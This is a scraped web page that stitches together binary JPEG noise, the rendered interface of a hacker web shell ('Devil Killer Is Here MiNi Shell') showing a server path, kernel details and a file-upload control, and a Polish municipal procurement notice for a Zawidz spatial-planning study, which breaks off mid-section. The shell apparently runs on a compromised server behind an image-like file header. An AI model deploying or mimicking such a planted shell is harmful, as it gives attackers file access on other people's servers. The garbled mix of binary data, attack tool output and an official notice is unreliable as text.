JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210521/0006090201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00060902 z dnia 2021-05-21</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Opracowanie projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Zawidz” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ZAWIDZ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611016011</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Mazowiecka 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zawidz Kościelny</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-226</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 276 61 58</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">24 276 51 44</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">referatkomunalny@zawidz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zawidz.bip.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Opracowanie projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Zawidz” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1c34a39b-ba00-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00060902</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00037443/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Opracowanie zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Zawidz </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.zawidz.bip.org.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl https://epuap.gov.pl//ugzawidz/skrytka</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim. 2) Komunikacja w postępowaniu o udzielenie<br/>zamówienia, w tym składanie Ofert, wymiana informacji oraz przekazywanie dokumentów lub<br/>oświadczeń między Zamawiającym a Wykonawcą odbywa się przy użyciu środków komunikacji<br/>elektronicznej, tj.: a) miniPortalu https://miniportal.uzp.gov.pl/ - (szyfrowanie oferty, formularze ePuap),<br/>b) ePUAPu adres skrzynki: ugzawidz/skrytka - (formularze do komunikacji, SKŁADANIE OFERT), c)<br/>poczty elektronicznej referatkomunalny@zawidz.pl (korespondencja oprócz Ofert), d) Platformy e-<br/>Zamówienia https://ezamowienia.gov.pl/pl/ (Ogłoszenie o zamówieniu, informacje o postępowaniu), e)<br/>strona BIP Urzędu Gminy w Zawidzu http://zawidz.bip.org.pl (Ogłoszenie o zamówieniu, SWZ,<br/>dokumentacja techniczna, pytania i odpowiedzi do SWZ, informacje o postępowaniu). We wszelkiej<br/>korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się nr<br/>referencyjnym postępowania: RGK.271.4.2021. 3) Wykonawca zamierzający wziąć udział w<br/>postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca<br/>posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty oraz do<br/>formularza do komunikacji. 4) Faks nie stanowi doręczenia dokumentu, oświadczania, wniosku i innych<br/>dokumentów wymaganych przez Zamawiającego za pomocą środków komunikacji elektronicznej w<br/>rozumieniu przepisów o świadczeniu usług drogą elektroniczną. 5) Sposób sporządzenia dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 27 czerwca 2017 r. w<br/>sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego oraz udostępniania i przechowywania dokumentów elektronicznych tj. z dnia 9 lipca 2020<br/>r. (Dz.U. z 2020 r. poz. 1261). 6) Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji.<br/>Specyfikacja Warunków Zamówienia” przekazywanych przy ich użyciu opisane zostały w Regulaminie<br/>korzystania z miniPortalu oraz Regulaminie ePUAP. 7) Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>komunikacji wynosi 150 MB. Do formularza do składania ofert załączyć można TYLKO JEDEN<br/>załącznik o maksymalnym rozmiarze do 150 MB. W celu załączenia większej ilości dokumentów w<br/>jednym załączniku należy je podpisać kwalifikowanym podpisem elektronicznym, skompresować w<br/>formacie ZIP, a następnie załączyć do formularza. 8) Za datę przekazania oferty, wniosków,<br/>zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art.13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady / UE/ ,2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych<br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE/ ogólne rozporządzenie o danych / Dz.U.UE.L119 z dnia 4 maja<br/>2016 roku, str. 1 : zwanym dalej RODO/2. Informujemy , że :a/ administratorem danych osobowych jest<br/>Gmina Zawidz , ul. Mazowiecka 24 , 09-226 Zawidz Kościelny b/ administrator wyznaczył Inspektora<br/>Danych Osobowych , z którym można się kontaktować pod adresem: e-mail: rodo.iodo@zawidz.pl.c/<br/>Pana dane osobowe przetwarzane będą na podstawie art.6 ust.1 lit. C RODO w celu związanym z<br/>przedmiotowym postępowaniem o udzielenie zamówienia publicznego , prowadzonym w trybie<br/>przetargu nieograniczonego .d/ Odbiorcami Pana danych osobowych będą osoby lub podmioty , którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 PZP.e/ Pana dane osobowe<br/>będą przechowywane zgodnie z art. 78 ust.1 PZP przez okres 4 lat od dnia zakończenia postępowania<br/>o udzielenie zamówienia , a jeżeli czas trwania umowy przekracza 4 lata okres przechowywania<br/>obejmuje cały czas trwania umowy .f/ Obowiązek podania przez Pana danych osobowych<br/>bezpośrednio Pana dotyczących jest wymogiem ustawowym określonym w przepisach PZP ,<br/>związanych z udziałem w postępowaniu o udzielenie zamówienia publicznego .g/ W odniesieniu do<br/>Pana danych osobowych , decyzje nie będą podejmowane w sposób zautomatyzowany stosownie do<br/>art. 22 RODO .h/ Posiada Pan :- na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>Pana dotyczących / w przypadku , gdy skorzystanie z tego prawa wymagałoby po stronie<br/>administratora niewspółmiernie dużego wysiłku może zostać Pan zobowiązany do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania , w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub<br/>daty zakończonego postępowania o udzielenie zamówienia .- na podstawie art. 16 RODO prawo do<br/>sprostowania Pana danych osobowych / skorzystanie z prawa do sprostowania nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności i protokołu oraz jego<br/>załączników /.- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie<br/>zamówienia publicznego lub konkursu oraz przypadków , o których mowa w art. 18 ust.2 RODO /<br/>prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania , w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej , lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego /.- Prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych , gdy<br/>uzna Pan , że przetwarzanie danych osobowych Pana dotyczących narusza przepisy RODO .3. Nie<br/>przysługuje Panu : - w związku z art. 17 ust.3 lit.b, d lub e RODO prawo do usunięcia danych<br/>osobowych .- prawo do przenoszenia danych osobowych , o którym mowa w art. 20 RODO .- na<br/>podstawie art. 21 RODO prawo sprzeciwu , wobec przetwarzania danych osobowych , gdyż podstawą<br/>prawną przetwarzania Pana danych osobowych jest art. 6 ust.1 lit.c RODO .4. Przysługuje Panu prawo<br/>wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pana danych<br/>osobowych przez administratora . Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych , ul. Stawki 2 , 00 – 193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGK.271.4.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie zmiany studium uwarunkowań i kierunków<br/>zagospodarowania przestrzennego gminy Zawidz, dla obszaru w granicach administracyjnych<br/>gminy Zawidz o powierzchni ok. 18.377 ha - zawierającego część tekstową i graficzną (w skali<br/>1:10000), zgodnie z Uchwałą Nr 113/XXI//2020 Rady Gminy Zawidz z dnia 30 grudnia 2020 r. w<br/>sprawie przystąpienia do sporządzenia zmiany studium uwarunkowań i kierunków<br/>zagospodarowania przestrzennego gminy Zawidz. Granicami obszaru objętego zmianą studium<br/>są granice administracyjne gminy Zawidz. Opracowanie zmiany studium uwarunkowań i<br/>kierunków zagospodarowania przestrzennego gminy Zawidz należy wykonać zgodnie z ustawą z<br/>dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2020 r., poz.<br/>293 z późn. zm.), rozporządzeniem Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie<br/>zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy<br/>(Dz.U. z 2004 r. Nr 118, poz, 1233) oraz innymi przepisami prawa obowiązującymi w tym<br/>zakresie. Na obszarze gminy Zawidz przewiduje się wyznaczenie obszarów, na których<br/>rozmieszczone będą urządzenia wytwarzające energię z odnawialnych źródeł energii o mocy<br/>przekraczającej 100 kW, oraz ustalenie ograniczeń terenów budowy kurników i chlewni a także<br/>ich strefy ochronne związane z ograniczeniami w zabudowie oraz zagospodarowaniu i<br/>użytkowaniu terenu. W studium należy ustalić ich rozmieszczenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71410000-5 - Usługi planowania przestrzennego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty zamawiający kierował się będzie następującym kryterium: cena brutto – 100%<br/>Najniższa oferowana cena /cena oferowana w badanej ofercie x 100</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki<br/>udziału w postępowaniu, w szczególności dotyczące: 1) posiadania uprawnień do wykonywania<br/>określonej działalności lub czynności, jeżeli przepisy prawa nakładają ich obowiązek: w zakresie<br/>warunku posiadania uprawnień zamawiający informuje, że wykonawca składa oświadczenie o<br/>spełnianiu warunku zgodnie z załącznikiem nr 2 do SWZ.2) posiadania wiedzy i doświadczenia:<br/>zamawiający uzna, że warunek posiadania wiedzy i doświadczenia jest spełniony, jeżeli<br/>wykonawca wykaże, że wykonał, co najmniej jedną usługę polegającą na opracowaniu studium<br/>lub zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego obejmującego<br/>swoim zakresem powierzchnię, co najmniej całego miasta lub gminy. Zamawiający poprzez<br/>opracowanie rozumie uchwalone i obowiązujące studium uwarunkowań i kierunków<br/>zagospodarowania przestrzennego - od podjęcia uchwały o przystąpieniu do jego sporządzenia<br/>- do podjęcia uchwały o jego uchwaleniu - według procedur i problematyki określonych w<br/>ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z<br/>2018 r poz. 1945 z późń. zm. .3) dysponowania odpowiednim potencjałem technicznym oraz<br/>osobami zdolnymi do wykonania zamówienia: w zakresie warunku dysponowania odpowiednim<br/>potencjałem technicznym do wykonania zamówienia zamawiający informuje, że wykonawca<br/>składa oświadczenie o spełnianiu warunku zgodnie z załącznikiem nr 2 do SWZ. Zamawiający<br/>uzna, że warunek dysponowania osobami zdolnymi do wykonania zamówienia zamawiający jest<br/>spełniony, jeżeli wykonawca wykaże, że posiada uprawnienia do wykonywania zawodu<br/>urbanisty na podstawie obowiązujących przepisów i jest wpisany na listę członków właściwej<br/>izby.4) sytuacji ekonomicznej i finansowej: W zakresie warunku sytuacja ekonomiczna i<br/>finansowa zamawiający informuje, że wykonawca składa oświadczenie o spełnianiu warunku<br/>zgodnie z załącznikiem nr 2 do SWZ.4. Zamawiający dokona oceny spełniania warunków<br/>udziału w postępowaniu poprzez zastosowanie kryterium spełnia – nie spełnia, tj. zgodnie z<br/>zasadą, czy dokumenty zostały załączone do oferty i czy spełniają określone w SWZ<br/>wymagania. Z treści załączonych oświadczeń i dokumentów musi jednoznacznie wynikać, iż<br/>wyżej wymienione warunki Wykonawca spełnił. Wykonawca, w zakresie wskazanym przez<br/>Zamawiającego zobowiązany jest wykazać nie później niż na dzień składania ofert spełnienie<br/>warunków, o których mowa w art. 22 ust. 1 ustawy (art. 26 ust. 2a ustawy). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Na ofertę składają się następujące dokumenty i załączniki:1) Wypełniony<br/>,,Formularz oferty” z wykorzystaniem wzoru – załącznik nr 1 do SWZ.2) Podpisane oświadczenie z<br/>wykorzystaniem wzoru – załącznik nr 2 do SWZ. 2. W celu wykazania spełnia przez wykonawcę<br/>warunków, o których mowa w art. 22 ust. 1 ustawy należy przedłożyć:1) wykaz wykonanych usług w<br/>zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w<br/>okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia<br/>publicznego, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, z podaniem ich<br/>wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że<br/>usługi zostały wykonane należycie, według wzoru stanowiącego załącznik nr 4 do SWZ.2) Wykaz<br/>osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za<br/>świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie<br/>czynności, oraz informacją o podstawie do dysponowania tymi osobami – z wykorzystaniem wzoru –<br/>załącznik nr 5 do SWZ.3) oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu<br/>zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania tych<br/>uprawnień - załącznik nr 6 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">celu potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy należy przedłożyć:<br/>1) Podpisane oświadczenie o braku podstaw do wykluczenia z wykorzystaniem wzoru – załącznik nr 3<br/>do SWZ. 2) Aktualny (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)<br/>odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania<br/>braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, a w stosunku do osób fizycznych<br/>oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy. 3) Aktualne (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert) zaświadczenie właściwego naczelnika urzędu<br/>skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że<br/>uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub<br/>wstrzymanie w całości wykonania decyzji właściwego organu. 4) Aktualne (wystawione nie wcześniej<br/>niż 3 miesiące przed upływem terminu składania ofert) zaświadczenie właściwego oddziału Zakładu<br/>Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że<br/>wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub<br/>potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty<br/>zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający 